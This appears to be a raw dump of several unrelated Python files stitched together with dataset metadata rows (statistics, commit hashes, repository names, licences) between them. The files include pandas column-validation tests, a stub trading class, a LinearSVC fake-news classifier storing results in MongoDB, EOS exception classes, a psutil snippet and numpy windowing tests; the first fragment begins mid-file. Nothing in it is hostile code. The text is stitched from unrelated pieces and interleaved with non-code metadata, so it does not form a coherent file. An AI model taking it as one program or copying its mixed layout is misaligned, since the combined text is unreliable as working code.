df = pd.DataFrame({"col_1": ["h", "h", "h", "h"]})
self.expect_column_value_to_equal(df, "col_1", "h")
df = pd.DataFrame({"col_1": [1.1, 1.1, 1.1, 1.1]})
self.expect_column_value_to_equal(df, "col_1", 1.1)
def test_expect_column_value_to_equal_fails(self):
df1 = pd.DataFrame({"col_1": [2, 2, 5, 2]})
with pytest.raises(AssertionError) as excinfo:
self.expect_column_value_to_equal(df1, "col_1", 2)
assert "Column col_1 was not equal, found 5 : " == str(excinfo.value)
df2 = pd.DataFrame({"col_1": ["d", "d", "e", "d"]})
with pytest.raises(AssertionError) as excinfo:
self.expect_column_value_to_equal(df2, "col_1", "d")
assert "Column col_1 was not equal, found e : " == str(excinfo.value)
def test_expect_column_value_to_equal_if(self):
df = pd.DataFrame({"col_1": [1, 2, 1], "col_2": ["a", "b", "a"]})
self.expect_column_value_to_equal_if(df, "col_1", 1, "col_2", "a")
def test_expect_column_value_to_equal_if_fail(self):
df = pd.DataFrame({"col_1": [1, 2, 1], "col_2": ["a", "b", "a"]})
with pytest.raises(AssertionError) as excinfo:
self.expect_column_value_to_equal_if(df, "col_1", 1, "col_2", "b")
assert "Using filter col_1: 1, Column col_2 was not equal, found a : " == str(
excinfo.value
)
def test_expect_column_value_to_be_greater_if(self):
df = pd.DataFrame({"col_1": ["one", "two", "one"], "col_2": [2, 2, 3]})
self.expect_column_value_to_be_greater_if(df, "col_1", "one", "col_2", 1)
def test_expect_column_value_to_be_greater_if_fail(self):
df = pd.DataFrame({"col_1": ["one", "two", "one"], "col_2": [1, 2, 3]})
with pytest.raises(AssertionError) as excinfo:
self.expect_column_value_to_be_greater_if(df, "col_1", "one", "col_2", 3)
assert (
"Using filter col_1: one, Column col_2 was not greater than 3, found 1 : "
== str(excinfo.value)
)
with pytest.raises(AssertionError) as excinfo:
self.expect_column_value_to_be_greater_if(df, "col_1", "one", "col_2", 2)
assert (
"Using filter col_1: one, Column col_2 was not greater than 2, found 1 : "
== str(excinfo.value)
)
def test_expect_column_has_no_duplicate_rows_all(self):
df = pd.DataFrame({"col_1": [1, 2, 3], "col_2": ["a", "b", "c"]})
self.expect_column_has_no_duplicate_rows(df)
def test_expect_column_has_no_duplicate_rows_single(self):
df = pd.DataFrame({"col_1": [1, 2, 3], "col_2": ["a", "b", "c"]})
self.expect_column_has_no_duplicate_rows(df, "col_1")
def test_expect_column_has_no_duplicate_rows_list(self):
df = pd.DataFrame({"col_1": [1, 2, 3], "col_2": ["a", "b", "c"]})
self.expect_column_has_no_duplicate_rows(df, ["col_1", "col_2"])
def test_expect_column_has_no_duplicate_rows_all_fail(self):
df = pd.DataFrame({"col_1": [1, 2, 1, 4]})
with pytest.raises(AssertionError) as excinfo:
self.expect_column_has_no_duplicate_rows(df)
assert "Column col_1 contains a duplicate value : " == str(excinfo.value)
def test_expect_column_has_no_duplicate_rows_all_fail_multi_cols(self):
df = pd.DataFrame({"col_1": [1, 2, 3], "col_2": ["a", "a", "c"]})
with pytest.raises(AssertionError) as excinfo:
self.expect_column_has_no_duplicate_rows(df)
assert "Column col_2 contains a duplicate value : " == str(excinfo.value)
def test_expect_column_has_no_duplicate_rows_single_fail(self):
df = pd.DataFrame({"col_1": [1, 2, 3], "col_2": ["a", "c", "c"]})
with pytest.raises(AssertionError) as excinfo:
self.expect_column_has_no_duplicate_rows(df, "col_2")
assert "Column col_2 contains a duplicate value : " == str(excinfo.value)
def test_expect_column_has_no_duplicate_rows_single_fail_incorrect_col_name(self):
df = pd.DataFrame({"col_1": [1]})
with pytest.raises(AssertionError) as excinfo:
self.expect_column_has_no_duplicate_rows(df, "bla")
assert "Column bla is not valid : " == str(excinfo.value)
with pytest.raises(AssertionError) as excinfo:
self.expect_column_has_no_duplicate_rows(df, ["bla2"])
assert "Column bla2 is not valid : " == str(excinfo.value)
def test_expect_column_has_no_duplicate_rows_list_fail(self):
df = pd.DataFrame({"col_1": [1, 2, 3], "col_2": ["a", "c", "c"]})
with pytest.raises(AssertionError) as excinfo:
self.expect_column_has_no_duplicate_rows(df, ["col_2"])
assert "Column col_2 contains a duplicate value : " == str(excinfo.value)
def test_expect_column_has_no_duplicate_rows_type_unknown(self):
df = pd.DataFrame({"col_1": [1]})
with pytest.raises(AssertionError) as excinfo:
self.expect_column_has_no_duplicate_rows(df, 1)
assert "Check help for method usage : " == str(excinfo.value)
| 39.574409 | 108 | 0.616715 | 4,109 | 28,454 | 3.93064 | 0.058165 | 0.043341 | 0.068479 | 0.07337 | 0.869853 | 0.858894 | 0.831156 | 0.814439 | 0.794192 | 0.754133 | 0 | 0.068699 | 0.250545 | 28,454 | 718 | 109 | 39.629526 | 0.688675 | 0.005131 | 0 | 0.413858 | 0 | 0.011236 | 0.167597 | 0.002438 | 0 | 0 | 0 | 0 | 0.249064 | 1 | 0.132959 | false | 0 | 0.007491 | 0 | 0.142322 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
28206eb653e9277c12e1d30f7a7f06b91b21ec27 | 26 | py | Python | terrascript/tls/__init__.py | vfoucault/python-terrascript | fe82b3d7e79ffa72b7871538f999828be0a115d0 | [
"BSD-2-Clause"
] | null | null | null | terrascript/tls/__init__.py | vfoucault/python-terrascript | fe82b3d7e79ffa72b7871538f999828be0a115d0 | [
"BSD-2-Clause"
] | null | null | null | terrascript/tls/__init__.py | vfoucault/python-terrascript | fe82b3d7e79ffa72b7871538f999828be0a115d0 | [
"BSD-2-Clause"
] | null | null | null | """2017-11-28 18:09:01"""
| 13 | 25 | 0.538462 | 6 | 26 | 2.333333 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.583333 | 0.076923 | 26 | 1 | 26 | 26 | 0 | 0.730769 | 0 | null | 0 | null | 0 | 0 | null | 0 | 0 | 0 | null | 1 | null | true | 0 | 0 | null | null | null | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
283b7e870558af06fba900fa06370599d26c8b78 | 43 | py | Python | src/options/split/backward/__init__.py | DenDen047/SpatialNetworks | 62a076d12af474b19b406e605d970662d9699cdf | [
"MIT"
] | 3 | 2019-12-15T23:29:11.000Z | 2020-05-08T03:26:20.000Z | src/options/split/backward/__init__.py | DenDen047/SpatialNetworks | 62a076d12af474b19b406e605d970662d9699cdf | [
"MIT"
] | null | null | null | src/options/split/backward/__init__.py | DenDen047/SpatialNetworks | 62a076d12af474b19b406e605d970662d9699cdf | [
"MIT"
] | 3 | 2019-12-30T15:49:57.000Z | 2020-04-30T08:06:18.000Z | from . import greedy, probability, rescale
| 21.5 | 42 | 0.790698 | 5 | 43 | 6.8 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.139535 | 43 | 1 | 43 | 43 | 0.918919 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
9589d8433e043b15f019e1a7d9c8800588a6ea95 | 1,215 | py | Python | mdbacktest/trader.py | matthewmercuri/mdbacktest | 1cb1e0b644a21e264cbb43b66088b28962d8e8dd | [
"MIT"
] | null | null | null | mdbacktest/trader.py | matthewmercuri/mdbacktest | 1cb1e0b644a21e264cbb43b66088b28962d8e8dd | [
"MIT"
] | null | null | null | mdbacktest/trader.py | matthewmercuri/mdbacktest | 1cb1e0b644a21e264cbb43b66088b28962d8e8dd | [
"MIT"
] | null | null | null | class Trade:
def __init__(self):
pass
def buy_stock(self, portfolio, security, units, price):
'''buys security and adds it to the portfolio.
First checks if the trade is valid given the current
positions and cash balance. Logs the trade afterward.
arguments:
portfolio (df): current state of the portfolio
security (str): the ticker of the equity
units (int): the number of units to buy
price (float): the market price to purchase the shares
returns:
portfolio (df): new state of the portfolio after trade
'''
pass
def sell_stock(self, portfolio, security, units, price):
'''sells security and removes it from the portfolio.
First checks if the trade is valid given the current
positions and cash balance. Logs the trade afterward.
arguments:
portfolio (df): current state of the portfolio
security (str): the ticker of the equity
units (int): the number of units to sell
price (float): the market price to sell the shares
returns:
portfolio (df): new state of the portfolio after trade
'''
pass
| 32.837838 | 62 | 0.632922 | 160 | 1,215 | 4.76875 | 0.3125 | 0.094364 | 0.052425 | 0.099607 | 0.857143 | 0.857143 | 0.694626 | 0.694626 | 0.694626 | 0.694626 | 0 | 0 | 0.309465 | 1,215 | 36 | 63 | 33.75 | 0.909416 | 0.678189 | 0 | 0.428571 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.428571 | false | 0.428571 | 0 | 0 | 0.571429 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 6 |
95ed199311cbda3e4b5a1150bbe09bf4f22ef233 | 19 | py | Python | avl/__init__.py | jameshicks/avl | 6807cf3a3c9f4c32c090e0e0f29ffb74c0a78199 | [
"MIT"
] | null | null | null | avl/__init__.py | jameshicks/avl | 6807cf3a3c9f4c32c090e0e0f29ffb74c0a78199 | [
"MIT"
] | null | null | null | avl/__init__.py | jameshicks/avl | 6807cf3a3c9f4c32c090e0e0f29ffb74c0a78199 | [
"MIT"
] | null | null | null | from .avl import *
| 9.5 | 18 | 0.684211 | 3 | 19 | 4.333333 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.210526 | 19 | 1 | 19 | 19 | 0.866667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
95efa1e0ec0d202c016caab2bc3cf3b8f4c2ad83 | 94 | py | Python | os/cpu_ram.py | janbodnar/Python-Course | 51705ab5a2adef52bcdb99a800e94c0d67144a38 | [
"BSD-2-Clause"
] | 13 | 2017-08-22T12:26:07.000Z | 2021-07-29T16:13:50.000Z | os/cpu_ram.py | janbodnar/Python-Course | 51705ab5a2adef52bcdb99a800e94c0d67144a38 | [
"BSD-2-Clause"
] | 1 | 2021-02-08T10:24:33.000Z | 2021-02-08T10:24:33.000Z | os/cpu_ram.py | janbodnar/Python-Course | 51705ab5a2adef52bcdb99a800e94c0d67144a38 | [
"BSD-2-Clause"
] | 17 | 2018-08-13T11:10:33.000Z | 2021-07-29T16:14:02.000Z | #!/usr/bin/python
import psutil
print(psutil.cpu_percent())
print(psutil.virtual_memory())
| 13.428571 | 31 | 0.755319 | 13 | 94 | 5.307692 | 0.769231 | 0.318841 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.085106 | 94 | 6 | 32 | 15.666667 | 0.802326 | 0.170213 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.333333 | 0 | 0.333333 | 0.666667 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 1 | 0 | 6 |
25485990abce5aaa2b6682145c9e4be487ac3ef4 | 128 | py | Python | src/choice/abstract_choices_factory.py | xlurio/RockPaperScissorsPy | 927bbd1480dbca70c9bc3b982f4034ac2ff33c57 | [
"MIT"
] | null | null | null | src/choice/abstract_choices_factory.py | xlurio/RockPaperScissorsPy | 927bbd1480dbca70c9bc3b982f4034ac2ff33c57 | [
"MIT"
] | null | null | null | src/choice/abstract_choices_factory.py | xlurio/RockPaperScissorsPy | 927bbd1480dbca70c9bc3b982f4034ac2ff33c57 | [
"MIT"
] | null | null | null | class AbstractChoicesFactory:
def make_player1_choice(self):
pass
def make_player2_choice(self):
pass
| 16 | 34 | 0.679688 | 14 | 128 | 5.928571 | 0.642857 | 0.168675 | 0.337349 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.021277 | 0.265625 | 128 | 7 | 35 | 18.285714 | 0.861702 | 0 | 0 | 0.4 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.4 | false | 0.4 | 0 | 0 | 0.6 | 0 | 1 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 6 |
c2595fec4eb23f03fa057ebdf7c951d8137f139c | 149 | py | Python | dispatchsdk/__init__.py | DispatchMe/python-sdk | c571968d966f0bcfea4ab5ef7ed1e32596cf4d3b | [
"MIT"
] | 1 | 2020-05-28T15:27:45.000Z | 2020-05-28T15:27:45.000Z | dispatchsdk/__init__.py | DispatchMe/python-sdk | c571968d966f0bcfea4ab5ef7ed1e32596cf4d3b | [
"MIT"
] | null | null | null | dispatchsdk/__init__.py | DispatchMe/python-sdk | c571968d966f0bcfea4ab5ef7ed1e32596cf4d3b | [
"MIT"
] | null | null | null | from dispatchsdk.client import Client
from dispatchsdk.connector import ConnectorClient
from dispatchsdk.errors import ValidationError, RequestError
| 37.25 | 60 | 0.885906 | 16 | 149 | 8.25 | 0.5625 | 0.340909 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.087248 | 149 | 3 | 61 | 49.666667 | 0.970588 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
c260d1e2b7d206a56ee9d2aa5d024fcc1419d633 | 132 | py | Python | colour_hdri/tonemapping/__init__.py | colour-science/colour-hdri | 3a97c4ad8bc328e2fffabf84ac8b56d795dbeb82 | [
"BSD-3-Clause"
] | 92 | 2015-09-19T22:11:15.000Z | 2022-03-13T06:37:53.000Z | colour_hdri/tonemapping/__init__.py | colour-science/colour-hdri | 3a97c4ad8bc328e2fffabf84ac8b56d795dbeb82 | [
"BSD-3-Clause"
] | 24 | 2017-05-25T08:55:10.000Z | 2022-03-30T18:26:43.000Z | colour_hdri/tonemapping/__init__.py | colour-science/colour-hdri | 3a97c4ad8bc328e2fffabf84ac8b56d795dbeb82 | [
"BSD-3-Clause"
] | 9 | 2016-01-18T17:29:51.000Z | 2020-11-12T12:54:18.000Z | # -*- coding: utf-8 -*-
from .global_operators import * # noqa
from . import global_operators
__all__ = global_operators.__all__
| 18.857143 | 39 | 0.727273 | 16 | 132 | 5.3125 | 0.5625 | 0.529412 | 0.423529 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.009009 | 0.159091 | 132 | 6 | 40 | 22 | 0.756757 | 0.19697 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.666667 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
c29949d89ade73ac3a94cfd174010ec25f402b89 | 43 | py | Python | mitty/plugins/variants/__init__.py | latticelabs/Mitty-deprecated- | bf192600233daea8a42a1f995c60b1e883cbaaba | [
"Apache-2.0"
] | 1 | 2015-10-21T23:43:34.000Z | 2015-10-21T23:43:34.000Z | mitty/plugins/variants/__init__.py | latticelabs/Mitty | bf192600233daea8a42a1f995c60b1e883cbaaba | [
"Apache-2.0"
] | null | null | null | mitty/plugins/variants/__init__.py | latticelabs/Mitty | bf192600233daea8a42a1f995c60b1e883cbaaba | [
"Apache-2.0"
] | null | null | null | from mitty.plugins.variants.common import * | 43 | 43 | 0.837209 | 6 | 43 | 6 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.069767 | 43 | 1 | 43 | 43 | 0.9 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
c2c00d2dc5b3a636a0560a69aa3d24d55d2010dc | 4,046 | py | Python | Code/models/SVM/lSVC.py | SimonKenoby/Master-Thesis-Fake-News-Dectection | 2c3a5e82d4c7d6294ca87c265a1b638d61f2cb08 | [
"MIT"
] | 3 | 2020-06-04T22:39:57.000Z | 2022-02-16T08:15:14.000Z | Code/models/SVM/lSVC.py | SimonKenoby/Master-Thesis-Fake-News-Dectection | 2c3a5e82d4c7d6294ca87c265a1b638d61f2cb08 | [
"MIT"
] | 1 | 2020-09-22T12:00:06.000Z | 2020-09-24T19:09:04.000Z | Code/models/SVM/lSVC.py | SimonKenoby/Master-Thesis-Fake-News-Dectection | 2c3a5e82d4c7d6294ca87c265a1b638d61f2cb08 | [
"MIT"
] | null | null | null | import numpy as np
import os
import sklearn
from sklearn.feature_extraction.text import TfidfVectorizer, CountVectorizer
from sklearn.svm import LinearSVC
from sklearn.model_selection import train_test_split, KFold
from sklearn.metrics import classification_report, confusion_matrix
from sklearn.naive_bayes import MultinomialNB
from pymongo import MongoClient
import datetime
import sys
sys.path.append('../..')
import utils.dbUtils
import utils.gensimUtils
client = MongoClient('localhost', 27017)
db = client.TFE
collection = db.results
idx = collection.insert_one({'model' : 'linear_svc', 'date' : datetime.datetime.now(), 'downsampling' : False, 'smote' : False, 'corpus' : 'news_cleaned', 'penalty' : 'l2'})
print('Creating corpus')
corpus = utils.dbUtils.TokenizedIterator('news_cleaned', filters = {'type' : {'$in' : ['fake', 'reliable']}})
print('Creating labels')
y = np.array([x for x in corpus.iterTags()])
train_accuracy = []
test_accuracy = []
kf = KFold(n_splits=3, shuffle = True)
for i, (train_index, test_index) in enumerate(kf.split(y)):
print('Train and test set {}'.format(i))
model = LinearSVC()
vectorizer = TfidfVectorizer()
	print('\t Fitting tf-idf')
X_train = vectorizer.fit_transform([' '.join(corpus[i]) for i in train_index])
X_test = vectorizer.transform([' '.join(corpus[i]) for i in test_index])
y_train = y[train_index]
y_test = y[test_index]
	print('\t Fitting model')
model.fit(X_train, y_train)
print('\t Testing model')
train_accuracy.append(model.score(X_train, y_train))
test_accuracy.append(model.score(X_test, y_test))
#print("Training accuracy : {}".format(model.score(X_train, y_train)))
#print("Test accuracy : {}".format(model.score(X_test, y_test)))
#print("Classification report for test set")
#print(classification_report(y_test, model.predict(X_test)))
crp = classification_report(y_test, model.predict(X_test), labels=['fake', 'reliable'], output_dict = True)
collection.update_one({'_id' : idx.inserted_id}, {'$push' : {'classification_report' : crp, 'train_accuracy' : model.score(X_train, y_train), 'test_accuracy' : model.score(X_test, y_test)}})
collection.update_one({'_id' : idx.inserted_id}, {'$set' : {'mean_test_accuracy' : np.mean(test_accuracy) }})
idx = collection.insert_one({'model' : 'linear_svc', 'date' : datetime.datetime.now(), 'downsampling' : True, 'smote' : False, 'corpus' : 'news_cleaned', 'penalty' : 'l2'})
print('Creating corpus')
corpus = utils.dbUtils.TokenizedIterator('news_cleaned', filters = {'type' : {'$in' : ['fake', 'reliable']}, 'domain' : {'$nin' : ['nytimes.com', 'beforeitsnews.com']}})
print('Creating labels')
y = np.array([x for x in corpus.iterTags()])
train_accuracy = []
test_accuracy = []
kf = KFold(n_splits=3, shuffle = True)
for i, (train_index, test_index) in enumerate(kf.split(y)):
print('Train and test set {}'.format(i))
model = LinearSVC()
vectorizer = TfidfVectorizer()
	print('\t Fitting tf-idf')
X_train = vectorizer.fit_transform([' '.join(corpus[i]) for i in train_index])
X_test = vectorizer.transform([' '.join(corpus[i]) for i in test_index])
y_train = y[train_index]
y_test = y[test_index]
	print('\t Fitting model')
model.fit(X_train, y_train)
print('\t Testing model')
train_accuracy.append(model.score(X_train, y_train))
test_accuracy.append(model.score(X_test, y_test))
#print("Training accuracy : {}".format(model.score(X_train, y_train)))
#print("Test accuracy : {}".format(model.score(X_test, y_test)))
#print("Classification report for test set")
crp = classification_report(y_test, model.predict(X_test), labels=['fake', 'reliable'], output_dict = True)
collection.update_one({'_id' : idx.inserted_id}, {'$push' : {'classification_report' : crp, 'train_accuracy' : model.score(X_train, y_train), 'test_accuracy' : model.score(X_test, y_test)}})
collection.update_one({'_id' : idx.inserted_id}, {'$set' : {'mean_test_accuracy' : np.mean(test_accuracy) }}) | 43.978261 | 194 | 0.702422 | 556 | 4,046 | 4.913669 | 0.201439 | 0.023792 | 0.048316 | 0.035139 | 0.817716 | 0.817716 | 0.817716 | 0.817716 | 0.802343 | 0.802343 | 0 | 0.002855 | 0.134207 | 4,046 | 92 | 195 | 43.978261 | 0.777048 | 0.101087 | 0 | 0.676471 | 0 | 0 | 0.172955 | 0.011567 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.191176 | 0 | 0.191176 | 0.176471 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
c2c016863a2437cf0a833875a0eb549b7d61c889 | 36 | py | Python | seven/t/__init__.py | xiaolinzi-xl/python_imooc | 07bde890e3ab0ddef4467b0c77ef33614339a657 | [
"Apache-2.0"
] | null | null | null | seven/t/__init__.py | xiaolinzi-xl/python_imooc | 07bde890e3ab0ddef4467b0c77ef33614339a657 | [
"Apache-2.0"
] | null | null | null | seven/t/__init__.py | xiaolinzi-xl/python_imooc | 07bde890e3ab0ddef4467b0c77ef33614339a657 | [
"Apache-2.0"
] | null | null | null | import sys
import io
import datetime | 12 | 15 | 0.861111 | 6 | 36 | 5.166667 | 0.666667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.138889 | 36 | 3 | 15 | 12 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
6c5da96f2fc505244fe3561dfa3aa74a2b445853 | 347 | py | Python | eosjs_python/Exceptions.py | ankitwandx/eosjs_python | 07e5bc8f8508aa83a7d6bde4f54e9e6728d97b30 | [
"MIT"
] | 45 | 2018-06-04T20:19:17.000Z | 2021-12-24T16:44:43.000Z | eosjs_python/Exceptions.py | ankitwandx/eosjs_python | 07e5bc8f8508aa83a7d6bde4f54e9e6728d97b30 | [
"MIT"
] | 11 | 2018-08-31T13:56:13.000Z | 2022-03-09T21:26:43.000Z | eosjs_python/Exceptions.py | ankitwandx/eosjs_python | 07e5bc8f8508aa83a7d6bde4f54e9e6728d97b30 | [
"MIT"
] | 15 | 2018-06-18T10:22:29.000Z | 2022-03-16T06:23:09.000Z | class GenerateKeysException(Exception):
pass
class CreateAccountException(Exception):
pass
class PushContractTransactionException(Exception):
pass
class GetTableException(Exception):
pass
class GetBalanceException(Exception):
pass
class GetAccountException(Exception):
pass
class EncryptSecretException(Exception):
pass | 17.35 | 50 | 0.801153 | 28 | 347 | 9.928571 | 0.357143 | 0.327338 | 0.388489 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.138329 | 347 | 20 | 51 | 17.35 | 0.929766 | 0 | 0 | 0.5 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.5 | 0 | 0 | 0.5 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 6 |
6697ab6a8ecd3e31f8376069a5993fc1fcae5753 | 2,813 | py | Python | tests/processing/test_shape.py | tug-cps/datamodels | ae0e59e29e07648c414218c5b4d972d2c8f48a68 | [
"MIT"
] | null | null | null | tests/processing/test_shape.py | tug-cps/datamodels | ae0e59e29e07648c414218c5b4d972d2c8f48a68 | [
"MIT"
] | null | null | null | tests/processing/test_shape.py | tug-cps/datamodels | ae0e59e29e07648c414218c5b4d972d2c8f48a68 | [
"MIT"
] | null | null | null | import numpy as np
import pytest
from datamodels import processing
def test_prevent_zeros_scalar():
data = 0
corrected_data = processing.shape.prevent_zeros(data)
assert corrected_data == 1
def test_prevent_zeros_all_zeros_array():
data = np.zeros((4,))
corrected_data = processing.shape.prevent_zeros(data)
assert np.all(np.isclose(corrected_data, np.ones_like(data)))
def test_prevent_zeros_one_zero_array():
data = np.array([1.0, 1.0, 1.0, 0.0, 1.0])
corrected_data = processing.shape.prevent_zeros(data)
assert np.all(np.isclose(corrected_data, np.ones_like(data)))
@pytest.mark.parametrize(
"lookback, lookahead", [(0, 0), (0, 1), (0, 2), (1, 1), (2, 1)]
)
def test_get_windows(lookback, lookahead):
samples = 5
input_features = 4
target_features = 1
features = np.reshape(
np.arange(samples * input_features), (samples, input_features)
)
targets = np.reshape(
np.arange(samples * target_features), (samples, target_features)
)
x, y = processing.shape.get_windows(
lookback, features, lookahead, targets, targets_as_sequence=True
)
expected_shape_x = (samples - lookback - lookahead, lookback + 1, input_features)
expected_shape_y = (samples - lookback - lookahead, lookahead + 1, target_features)
assert x.shape == expected_shape_x
assert y.shape == expected_shape_y
# assert that there are not duplicate entries
_, counts = np.unique(x, return_counts=True, axis=0)
assert np.all(counts == 1), f"not all samples are unique, x: {x}"
_, counts = np.unique(y, return_counts=True, axis=0)
assert np.all(counts == 1), f"not all samples are unique, y: {y}"
@pytest.mark.parametrize(
"lookback, lookahead", [(0, 0), (0, 1), (0, 2), (1, 1), (2, 1)]
)
def test_get_windows_single_targets(lookback, lookahead):
samples = 5
input_features = 2
target_features = 1
features = np.reshape(
np.arange(samples * input_features), (samples, input_features)
)
targets = np.reshape(
np.arange(samples * target_features), (samples, target_features)
)
x, y = processing.shape.get_windows(
lookback, features, lookahead, targets, targets_as_sequence=False
)
expected_shape_x = (samples - lookback - lookahead, lookback + 1, input_features)
expected_shape_y = (samples - lookback - lookahead, 1, target_features)
assert x.shape == expected_shape_x
assert y.shape == expected_shape_y
# assert that there are not duplicate entries
_, counts = np.unique(x, return_counts=True, axis=0)
assert np.all(counts == 1), f"not all samples are unique, x: {x}"
_, counts = np.unique(y, return_counts=True, axis=0)
assert np.all(counts == 1), f"not all samples are unique, y: {y}"
